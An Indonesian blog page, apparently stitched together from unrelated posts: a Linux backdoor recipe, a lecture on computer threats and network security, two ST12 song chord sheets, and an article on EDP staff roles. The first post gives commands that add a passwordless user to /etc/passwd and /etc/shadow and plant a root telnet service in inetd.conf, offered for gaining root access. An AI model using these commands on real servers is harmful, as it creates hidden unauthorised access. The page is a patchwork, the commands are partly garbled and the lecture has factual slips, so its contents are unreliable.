Type load in console to get root access

User Backdoor ( Tanpa Password )
echo test::512:512:4:/:/bin/bash >> /etc/passwd
echo test::11092:0:99999:7:-1:-1:134537332 >>
> /etc/shadow
Contoh:
Red Hat Linux release 6.0 Publisher's Edition
> (Hedwig)
Kernel 2.2.5-15smp on an i686
login: Escuver
[test@xes /]$

Port Backdoor
echo stream tcp nowait root
> /usr/sbin/in.telnetd
in.telnetd >> /etc/inetd.conf
/etc/rc.d/init.d/inet restart

Ketiga Backdoor ini dapat digunakan bersama. Pertama, telnet ke server menggunakan port backdoor, kemudian masukan backdoored login (username) Terakhir ketik Load.

Baca selengkapnya ��

Jenis-jenis Ancaman Komputer

 1. Interupsi (interuption).
Sumber daya sistem komputer dihancurkan atau menjadi tak tersedia atau tak berguna. Interupsi merupakan ancaman terhadap ketersediaan.
Contoh : penghancuran bagian perangkat keras, seperti harddisk, pemotongan kabel komunikasi.
2. Intersepsi (interception).
Pihak tak diotorisasi dapat mengakses sumber daya. Interupsi merupakan ancaman terhadap kerahasiaan. Pihak tak diotorisasi dapat berupa orang
atau program komputer.
Contoh : penyadapan untuk mengambil data rahasia, mengetahui file tanpa diotorisasi.
3. Modifikasi (modification).
Pihak tak diotorisasi tidak hanya mengakses tapi juga merusak sumber daya. Modifikasi merupakan ancaman terhadap integritas.
Contoh : mengubah nilai-nilai file data, mengubah program sehingga bertindak secara berbeda, memodifikasi pesan-pesan yang di transmisikan pada jaringan.
4. Fabrikasi (fabrication).
Pihak tak diotorisasi menyisipkan/memasukkan objek-objek palsu ke sistem.
Fabrikasi merupakan ancaman terhadap integritas.
Contoh : memasukkan pesan-pesan palsu ke jaringan, penambahan record ke file.

• Contoh kasus dalam Sistem Informasi :
Kasus Keamanan Sifo
Deadlock adalah suatu kondisi dimana dua proses atau lebih saling menunggu proses yang lain untuk melepaskan resource yang sedang dipakai. Karena beberapa proses itu saling menunggu, maka tidak terjadi kemajuan dalam kerja proses-proses tersebut. Deadlock adalah masalah yang biasa terjadi ketika banyak proses yang membagi sebuah resource yang hanya boleh dirubah oleh satu proses saja dalam satu waktu.

Prinsip dari Deadlock
Deadlock dalam arti sebenarnya adalah kebuntuan. Kebuntuan yang dimaksud dalam sistem operasi adalah kebuntuan proses. Jadi Deadlock ialah suatu kondisi dimana proses tidak berjalan lagi ataupun tidak ada komunikasi lagi antar proses. Deadlock disebabkan karena proses yang satu menunggu sumber daya yang sedang dipegang oleh proses lain yang sedang menunggu sumber daya yang dipegang oleh proses tersebut. Dengan kata lain setiap proses dalam set menunggu untuk sumber yang hanya dapat dikerjakan oleh proses lain dalam set yang sedang menunggu.
Strategi untuk menghadapi deadlock dapat dibagi menjadi tiga pendekatan, yaitu :
1. Mengabaikan adanya deadlock.
2. Memastikan bahwa deadlock tidak akan pernah ada, baik dengan metode Pencegahan, dengan mencegah empat kondisi deadlock agar tidak akan pernah terjadi. Metode Menghindari deadlock, yaitu mengizinkan empat kondisi deadlock, tetapi menghentikan setiap Proses yang kemungkinan mencapai deadlock.
3. Membiarkan deadlock untuk terjadi, pendekatan ini membutuhkan dua metode yang saling mendukung.

• Contoh kasus dalam Sistem Komputer :
Ancaman-ancaman canggih terhadap sistem komputer adalah program yang mengeksploitasi kelemahan sistem komputer. Ancaman-ancaman tersebut dapat dibagai dalam 2 katagori, yaitu:
1. Program-program yang memerlukan program inang (host program)
Fragmen program tidak dapat mandiri secara independen dari suatu program aplikasi, program utilitas atau program sistem.
2. Program-program yang tidak memerlukan program inang.
Program sendiri yang dapat dijadwalkan dan dijalankan oleh sistem operasi.

Adapun bentuk dari ancaman itu sendiri di antaranya :
• Bacteria
Bacteria adalah program yang mengkonsumsi sumber daya sistem dengan mereplikasi dirinya sendiri.
Bacteria tidak secara eksplisit merusak file.
Bacteria bereproduksi secara eksponensial, dengan cepat mengambil alih seluruh kapasitas pemroses, memori atau ruang disk, mengakibatkan penolakan pengaksesan pemakai
ke sumber daya.

• Logic Bomb
Logic Bomb adalah logik yang ditempelkan pada program komputer agar memeriksa suatu kompulan kondisi di sistem. Ketika kondisi-kondisi terpenuhi, logik mengeksekusi suatu fungsi yang menghasilkan aksi-aksi tak terotorisasi.

• Trapdoor
Trapdoor adalah titik masuk tak terdokumentasi rahasia di suatu program untuk memberikan akses tanpa metodemetode otentifikasi normal. Trapdoor telah dipakai secara benar selama bertahun-tahun oleh pemrogram untuk mencari kesalahan program. Trapdoor menjadi ancaman ketika digunakan pemrogram jahat untuk memperoleh pengaksesan tak diotorisasi

• Trojan Horse
Trojan Horse adalah rutin tak terdokumentasi rahasia ditempelkan dalam satu program berguna. Program yang berguna mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi yang tidak diinginkan. Eksekusi program menyebabkan eksekusi rutin yang rahasia tersebut.

• Virus
Virus adalah kode yang ditempelkan dalam satu program yang menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih. Program menginfeksi program-program lain dengan memodifikasi program-program tersebut. Modifikasi itu termasuk memasukkan kopian program virus yang kemudian dapat menginfeksi program-program lain.

• Worm
Worm adalah program yang dapat mereplikasi dirinya dan mengirim kopian-kopian dari komputer ke komputer lewat hubungan jaringan. Network Worm menggunakan jaringan untuk menyebarkan dari sistem ke sistem lain. Sekali aktif di suatu sistem, network worm dapat berlaku seperti virus, bacteria atau trojan horse atau emlakukan sejumlah aksi menjengkelkan atau menghancurkan.

• Contoh kasus dalam Transaksi Perbankan :
a. Joycomputing, diartikan sebagai perbuatan seseorang yang menggunakan komputer secara tidak sah atau tanpa ijin dan menggunakannya dengan melampaui wewenang yang diberikan. Tindakan ini dapat dikategorikan sebagai tindak pidana pencurian (Pasal 362 KUHP).

b. Hacking, diartikan sebagai tindakan ini dapat di kategorikan sebagai tindakan pidana perbuatan tanpa wewenang masuk dengan memaksa ke dalam rumah atau ruangan yang tertutup atau pekarangan atau tanpa haknya berjalan di atas tanah milik orang lain (Pasal 167 dan 551 KUHP).

c. The Trojan Horse, diartikan sebagai tindak pidana penggelapan (Pasal 372 dan 374). Apabila kerugian yang ditimbulkan menyangkut keuangan negara, tindakan ini dapat dikategorikan sebagai tindak pidana korupsi.

d. Data Leakage, diartikan sebagai pembocoran data rahasia yang dilakukan dengan cara menulis data-data rahasia tersebut kedalam kode-kode tertentu sehingga data dapat dibawa keluar tanpa diketahui pihak yang bertanggungjawab. Tindakan ini dapat dikategorikan sebagai tindak pidana terhadap keamanan negara (Pasal 112, 113 dan 114 KUHP) dan tindak pidana membuka rahasia perusahaan atau kewajiban menyimpan rahasia profesi atau jabatan (Pasal 322 dan 323 KUHP).

e. Data diddling, diartikan sebagai suatu perbuatan yang mengubah data valid atau sah dengan cara yang tidak sah, yaitu dengan mengubah input data atau output data. Tindakan ini dapat dikategorikan sebagai tindak pidana pemalsuan surat (Pasal 263 KUHP). Upaya yang dilakukan oleh BPHN yang melakukan penafsiran terhadap berbagai ketentuan yang ada khususnya ketentuan KUHP terhadap aktivitas cybercrime, kiranya sudah cukup baik dalam upaya menanggulangi aktivitas cybercrime yang sudah sangat nyata berada di tengah-tengah kita, meskipun baru sebatas suatu upaya untuk mengisi kekosongan hukum. Akan tetapi sebagaimana telah disebutkan di muka, perbedaan konsep mengenai ruang dan waktu dari ketentuan hukum Pidana dengan sifat khas dari cybercrime, dapat membawa kesulitan dalam penerapannya, bahkan untuk beberapa pasal penerapan KUHP terhadap aktivitas di cyberspace patut untuk dipertanyakan.

2. Jenis-jenis Keamanan Komputer antara lain :
• Protokol 802.1x
Protokol 802.1x adalah sebuah protokol yang dapat melakukan otentikasi pengguna dari peralatan yang akan melakukan hubungan ke sebuah titik-akses. Dengan protokol ini, ketika sebuah komputer melakukan hubungan ke sebuah titik-akses (hub atau switch), maka pengguna komputer tersebut perlu melakukan otentikasi sebelum komputer tersebut terhubung ke jaringan komputer. Protokol ini sangat berguna untuk melindungi jaringan komputer sekaligus meng-akomodasi pengguna-pengguna yang memiliki peralatan atau komputer yang bersifat mobile seperti notebook atau PDA. Dengan digunakannya protokol ini, dapat dijamin bahwa peralatan komputer yang berusaha melakukan akses ke jaringan komputer sedang dipergunakan oleh pihak yang memang telah diizinkan untuk melakukan akses.
Tiga komponen yang terlibat dalam protokol ini adalah peralatan yang akan melakukan akses (supplicant), server yang akan melakukan otentikasi (server RADIUS) dan peralatan yang menjadi titik akses (otentikator). Secara umum, tahapan-tahapan dalam protokol ini adalah :
1. Secara default akses ke jaringan tertutup.
2. Sebuah supplicant melakukan akses dan meminta izin akses ke otentikator, yang kemudian meneruskannya ke server otentikasi.
3. Server otentikasi menjawab dengan memberikan 'tantangan' ke supplicant melalui otentikator.
4. Melalui otentikator, supplicant menjawab 'tantangan' yang diberikan.
5. Apabila jawaban yang diberikan supplicant benar, server otentikasi akan memberitahu ke otentikator yang kemudian akan memberikan akses jaringan ke supplicant.
6. Akses jaringan yang sudah terbuka, akan tetap terbuka sampai ketika terjadi perubahan status koneksi, misalnya koneksi diputus oleh pengguna atau alat yang terhubung berubah. Ketika terjadi perubahan status, akses akan kembali ditutup dan proses otentikasi akan berulang kembali.

Pada perkembangannya, protokol ini digunakan secara lebih mendalam, bukan hanya untuk melakukan otentikasi terhadap pengguna peralatan yang melakukan akses, melainkan juga akan digunakan untuk memeriksa apakah konfigurasi peralatan yang melakukan akses sudah sesuai dengan kebijakan yang berlaku. Misalkan akan dilakukan pemeriksaan apakah program antivirus yang berjalan pada sebuah notebook yang akan melakukan koneksi sudah mempergunakan versi yang terbaru, jika kondisi tersebut tidak terpenuhi maka akses jaringan tidak akan diberikan. Selain itu protokol ini juga dapat digunakan untuk menegakkan sebuah kebijakan pada peralatan-peralatan yang akan melakukan akses jaringan komputer.
Kelemahan dari protokol ini adalah, protokol ini harus diimplementasikan satu per satu pada semua switch/hub yang menjadi titik akses jaringan komputer.



• Mac Address
Mac Address Authentication adalah sebuah mekanisme di mana sebuah peralatan yang akan melakukan akses pada sebuah titik-akses sudah terdaftar terlebih dahulu. Berbeda dengan protokol 802.1x yang memastikan bahwa alat yang melakukan koneksi dipergunakan oleh pihak yang berwenang, metode ini untuk memastikan apakah peralatan yang akan melakukan akses adalah peralatan yang berhak untuk akses tanpa mempedulikan siapa yang mempergunakannya. Pada setiap peralatan jaringan komputer terdapat sebuah identitas yang unik. Berdasarkan identitas tersebutlah metode ini melakukan otentikasi. Pada setiap paket data yang dikirimkan sebuah peralatan akan mengandung informasi mengenai identitas peralatan tersebut, yang akan dibandingkan dengan daftar akses yang dimiliki setiap titik-akses, apabila ternyata identitas peralatan terdapat dalam daftar, paket yang dikirimkannya akan diteruskan apabila tidak, maka paket yang dikirimkannya tidak akan diteruskan.
Keuntungan metode ini jika dibandingkan dengan protokol 802.1x adalah metode ini sudah lebih banyak diimplementasikan pada switch/hub yang sering digunakan sebagai titik akses. Selain itu, untuk mempergunakan metode ini, tidak perlu semua switch/hub melakukan filtering, namun cukup switch/hub utama saja yang melakukannya.
Kelemahan utama dari metode ini adalah seseorang dapat dengan mudah memanipulasi identitas unik pada peralatan yang digunakannya, sehingga peralatan tersebut dapat melakukan akses ke sebuah jaringan komputer. Oleh karena itu sangat penting untuk menjaga integritas daftar identitas peralatan yang dapat melakukan akses ke jaringan.

• WEP dan WPA
Perkembangan teknologi telah membuat transmisi data melalui media gelombang radio memiliki kualitas yang hampir sama dengan kualitas transmisi data melalui media kabel. Dengan mempegunakan wireless network, koneksi ke sebuah jaringan komputer menjadi sangat mudah karena tidak lagi terhambat oleh penggunaan kabel. Asalkan sebuah peralatan jaringan komputer masih dalam jangkauan gelombang radio komputer penyedia jaringan, peralatan tersebut dapat terhubung ke dalam jaringan komputer. Akan tetapi, penggunaan media gelombang radio untuk transmisi data memiliki berbagai permasalahan keamanan yang cukup serius. Sifat gelombang radio yang menyebar menyebabkan siapa saja yang berada pada jangkauan gelombang radio yang digunakan untuk komunikasi data dapat mencuri data yang dikirimkan oleh sebuah pihak ke pihak lain dengan mudah. Oleh karena itu dikembangkan metode yang disebut dengan Wired Equivalent Privacy (WEP).
Tujuan utama dari WEP adalah berusaha untuk memberikan tingkat privasi yang diberikan oleh penggunaan jaringan berbasiskan kabel. Dalam melakukan usaha itu, WEP akan melakukan enkripsi terhadap data-data yang dikirimkan antara dua peralatan jaringan komputer berbasiskan gelombang radio, sehingga data yang dikirimkan tidak dapat dicuri oleh pihak lain. Untuk ini, WEP mempergunakan algoritma stream-cipher RC4 untuk menjaga kerahasiaan data dan CRC- 32 sebagai kontrol integritas data yang dikirimkan. Oleh karena ada peraturan pembatasan ekspor teknologi enkripsi oleh pemerintah Amerika Serikat, maka pada awalnya panjang kunci yang dipergunakan hanyalah sepanjang 40 bit. Setelah peraturan tersebut dicabut, maka kunci yang digunakan adalah sepanjang 104 bit.
Beberapa analis menemukan bahwa WEP tidak aman dan seseorang dapat dengan mudah menemukan kunci yang digunakan setelah melakukan analisa paket terenkripsi yang dia dapatkan. Oleh karena itu pada tahun 2003 dibuat standar baru yaitu Wi-Fi Protected Access (WPA). Perbedaan antara WEP dengan WPA adalah penggunaan protokol 802.1x untuk melakukan distribusi kunci yang digunakan dalam melakukan proses enkripsi dan dekripsi. Selain itu panjang kunci yang digunakan juga bertambah panjang menjadi 128 bit sehingga menambah tingkat kesulitan dalam menebak kunci yang digunakan. Selain itu untuk meningkatkan keamanan, juga dibuat sebuah sistem yang disebut dengan Temporal Key Integrity Control yang akan melakukan perubahan kunci secara dinamis selama sistem sedang digunakan. Pada perkembangan selanjutnya, yaitu pada tahun 2004 dibuat standard WPA2, dimana algoritma RC4 digantikan oleh algoritma enkripsi baru yaitu Advance Encryption System (AES) dengan panjang kunci sepanjang 256 bit.

Contoh kasus yang terjadi :
• Pada tahun 1983 untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

• Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama partai di dalamnya menjadi nama-nama "unik", seperti Partai Kolor Ijo, Partai Mbah Jambon, Partai Jambu, dan lain sebagainya. Dani menggunakan teknik SQL Injection(pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari Kamis, 22 April 2004.

• Logic bomb merupakan program komputer untuk diaktifkan pada waktu tertentu. Logic bomb merupakan metode tertua yang digunakan untuk tujuan sabotase. Contoh kasus logic bomb ini adalah seperti yang dilakukan oleh Donald Burleson seorang programmer perusahaan asuransi di Amerika. Ia dipecat karena melakukan tindakan menyimpang. Dua hari kemudian sebuah logic bomb bekerja secara otomatis mengakibatkan kira-kira 160.000 catatan penting yang terdapat pada komputer perusahaan terhapus. Kebocoran data merupakan metode pencurian atau pengambilan data secara tidak sah. Teknik yang digunakan mulai dari yang sederhana seperti mengambil data dengan media penyimpanan atau dengan teknik khusus seperti mencari kelemahan dalam sistem keamanan komputer baru mengambil data yang diperlukan.

Baca selengkapnya ��

ST12 - Saat terakhir

[intro] D A Bm F#m G D A

D A
Tak pernah terpikir olehku
Bm F#m
Tak sedikitpun ku bayangkan
G D A
Kau akan pergi tinggalkan kusendiri

D A
Begitu sulit kubayangkan
Bm F#m
Begitu sakit ku rasakan
G D A
Kau akan pergi tinggalkan ku sendiri

G
Di bawah batu nisan kini
A
Kau tlah sandarkan
D A/C# Bm
Kasih sayang kamu begitu dalam
G
sungguh ku tak sanggup
A D
Ini terjadi krna ku sangat cinta

[chorus]
G A
Inilah saat terakhirku melihat kamu
D A/C# Bm
Jatuh air mataku menangis pilu
G E
Hanya mampu ucapkan
A
Selamat jalan kasih

D A/C#
Satu jam saja kutelah bisa
Bm G
cintai kamu kamu kamu di hatiku
D A
Namun bagiku melupaknmu
G A
buth waktuku seumur hidup

D A/C#
Satu jam saja kutelah bisa
Bm G
sayangi kamu di hatiku
D A
Namun bagiku melupaknmu
G A
butuh waktuku seumur hidup

[interlude] G Bm Em F# Bm A-G Em A

Baca selengkapnya ��

ST12-Cari Pacar Lagi

[intro] G

G
Cintaku cintaku padamu
Em
Tak besar seperti dulu
Am
kamu kok begitu menilai cintaku
D
Begitu rendah di matamu

G
Sayangku sayangku padamu
Em
Tak indah seperti dulu
Am
Maumu begini maumu begitu
D
Tak pernah engkau hargai aku

C
Oo ooh i am sorry
D G
Ku tak akan love U lagi

G
Ku peluk memeluk dirimu
Em
Tak hangat seperti dulu
Am
Ku jadi selingkuh karna kau selingkuh
D
Biar sama-sama kita selingkuh

C
Oo ooh i am sorry
D G
Ku tak akan love you lagi

[chorus]
C
Biar ku putuskan saja
D Bm
Ku tak mau hatiku terluka
Em Am
Lebih baik ku cukupkan saja
D G
Ku tak mau batinku tersiksa

C
Jangan kau slalu merasa
D Bm
Wanita bukan dirimu saja
Em Am
Lebih baik ku putuskan saja
D G
Cari pacar lagi

[interlude] G Em Am C G
Em Am D G

D G
Cari pacar lagi
D G
Cari pacar lagi

Baca selengkapnya ��

EDP Operator

EDP OPERATOR

Brainware, merupakan tenaga (manusia) yang bertugas, mengontrol dan bertanggung jawab dalam aktivitas (kelangsungan) pengolahan data elektronis.
Dalam suatu EDP (Electronic Data Processing) ada beberapa tenaga yang bertugas dan berlangsung atas kelancaran dan aktivitas pengolahan data dimana tanggung jawab dan tugas yang dibebankan kepada masing-masing personil tergantung dari jabatan dan tingkatannya masing-masing.

1) Struktur Organisasi EDP
Dengan berkembangnya dunia komputer sebagai seperangkat alat yang mampu membantu dan menggantikan tugas-tugas manusia dalam operasionil pengolahan data, maka perlu juga dipikirkan letak organisasi yang tepat untuk menempatkan EDP dalam suatu badan (organisasi). Organisasi EDP diletakkan dalam suatu instansi (organisasi), harus dilihat tujuan, kegunaan, dan manfaatnya apakah dapat menunjang kebutuhan-kebutuhan informasi pengolahan data elektronik.
Tujuan ditempatkannya organisasi EDP tergantung dari banyaknya faktor, antara lain:
1. Sifat organisasi dan instansi
2. Lingkup geografis
3. Kerja yang didukung
4. Tingkat perkembangan komputerisasi
5. keinginginan pemimpin
Berdasarkan faktor-faktor di atas inilah suatu unit EDP dapat digunakan atau tidaknya. Jika suatu unit EDP hendak digunakan sebagai penunjang pengolahan data, maka dapat digambarkan struktur dari organisasi EDP seperti pada gambar di bawah ini.



Struktur Organisasi EDP

Dari bagan struktur di atas, akan di bahas sedikit tentang fungsional dari masing-masing unit.

1. Unit Pembangunan Sistem
Unit ini merupakan inti dari suatu pusat pengolahan data elektronik, walaupun tak bisa untuk mengabaikan unit-unit yang lainnya. Unit ini berfungsi bilamana suatu sistem komputer yang harus dibuat. Dengan kata lain yang kerjanya membuat software, dan juga sistem komputerisasi.

2. Unit Oprasionil
Suatu unit yang berfungsi dan bertugas mengendalikan (mengontrol) serta mengawasi kelancaran dari suatu aktivitas komputer (pengolahan data elektronik). Dan personil dari unit inilah yang selalu berhadapan dengan komputer dan mengontrol aktivitas-aktivitasnya.

3. Unit Bantuan Teknik
Yaitu suatu unit yang bertanggung jawab atas perawatan perangkat-perangkat dari komputer, baik dalam segi hardware, maupun sarana-sarana penunjangnya, (seperti, listrik, administrasi dataBase, sarana telekomunikasi, dan sebagainya).

2) Tugas dan Kwalifikasi Personil EDP
Dari struktur organisasi EDP yang telah digmbarkan di atas, ada beberapa personil yang dianggap pokok dan perlu diketahui tugas dan kwalifikasinya, antara lain operator, programmer, system programmer, system analyst dan EDP manager, jabatan-jabatan dalam organisasi EDP tersebut merupakan jabatan yang paling popular dan dikenal dalam suatu organisasi EDP.

1. Operator
Tugas
Melayani dan mengontrol seluruh kegiatan dan aktivitas pengolahan data, melaksanakan pekerjaan berdasarkan prosedur yang telah ditetapkan. Menyiapkan input data, serta membuat suatu kepustakaan dari seluruh file-file yang ada.
Kwalifikasi
Telah mendapatkan pendidikan dasar komputer, atau training tentang introduction to Computer. Mampu mengoprasikan komputer, atau sedikitnya menguasai beberapa package software, seperti MS Word, Excel, atau jenis software yang lainnya.
Karir
Seorang operator dapat meningkatkan dan naik dalam bidangnya (unit) sendiri, yaitu Manager Operator. Tetapi dapat juga seorang operator naik menjadi programmer.

2. Programmer
Tugas
Orang yang bertugas menyusun (membuat) program berdasarkan program specification (spesifikasi program, atau system design) yang diberikan dari system analyst. Specification ini merupakan suatu dasar dalam pembuatan data kreativitas serta kemampuanya untuk membuat dan menuangkan spesifikasi program tersebut kedalam bahasa pemrograman komputer, disamping itu ketelitian pun dibutuhkan dalam pembuatan program tersebut.
Kwalifikasi
Menguasai bidang dan tugas operator, menguasai salah satu atau lebih bahasa pemprograman tingkat tinggi (high-level language).
Karir
Seorang programmer mungkin saja menjadi system programmer atau kepala programmer atau bahkan dapat sampai kejenjeng system analyst.

3. System Programmer
Tugas
Orang yang membantu system analyst dalam pembangunan sistem, untuk mumbuat program aplikasi yang besar. Selain itu, seorang system programmer dapat pula sebagai penanggung jawab atas pemeliharaan seluruh software (program).
Kwalifikasi
Menguasai bidang dan tugas programmer, tetapi paling tidak bahasa pemprograman yang dikuasainya lebih dari satu. Selain itu juga dibutuhkan pengalaman-pengalaman bekerja di dalam suatu pengolahan data elektroniknya.
Karir
Seorang system programmer dapat meningkatkan karir menjadi seorang kepala unit Bantuan teknik, kepala programmer, atau system analyst, bahkan dapat saja menjadi seorang supervisor (staf ahli)

4. System Analyst
Tugas
Orang yang bertugas menganalisa masalah, mencari cara pemecahannya dan memcari jalan keluarnya serta membuat sistem untuk masalah tadi.
Kwalifikasi
Menguasai bidang dan tugas programmer, paling tidak telah menyelesaikan pendidikan jenjang Advanced Programmer. Telah mendapatkan dan menyelesaikan pendidikan SAD (System Analyst and Design)
Karir
Seorang system analyst dapat meningkatkan karirnya menjadi supervisor (staf ahli), atau bahkan dapat menjadi manager EDP.

5. Manager EDP
Tugas
Orang yang bertanggung jawab atas kelancara dan kelangsungan kegiatan (aktivitas) di dalam pengolahan data elektronik (EDP).
Kwalifikasi
Menguasai bidang system analyst. Pernah mengikuti training (pendidikan) Management Information System (MIS)
Karir
Karir dari manager EDP, dapat menjadi seorang professional consultant, dapat sebagai pimpinan perusahaan ynag mungkin milik sendiri.

3) Aspek-Aspek Sistem Komputerisasi
Aspek-aspek dasar sistem komputerisasi merupakan fasilitas-fasilitas yang secara principal harus ada apabila suatu usaha sudah memasuki langkah maju dengan menggunakan peralatan komputer sebagai alat bantu pengolahan data atau pengolahan informasi.
Aspek-aspek dasar yang dimaksud adalah sebagai contoh berikut:
1. Aspek Teknis :
a. Brainware (tenaga pelaksana)
b. Hardware (peralatan)
c. Software (program dan data)

2. Aspek Non Teknis
a. Dukungan Management
b. Disiplin baru

Jadi aspek-aspek dalam komputerisasi ada 5 (lima), seperti yang telah disebutkan di atas. Dari kelima aspek ini dapat dilihat seluruh aspek tersebut vital dalam suatu organisasi EDP. Dan antara aspek yang satu dengan yang lainnya saling berkaitan dan menunjang. Oleh sebab itu, jika salah satu diabaikan, maka kegiatan pengolahan data elektronik pun tak akan berjalan seperti yang diharapkan.

Baca selengkapnya ��

Kirimkan Komentar Anda

Template by : kendhin x-template.blogspot.com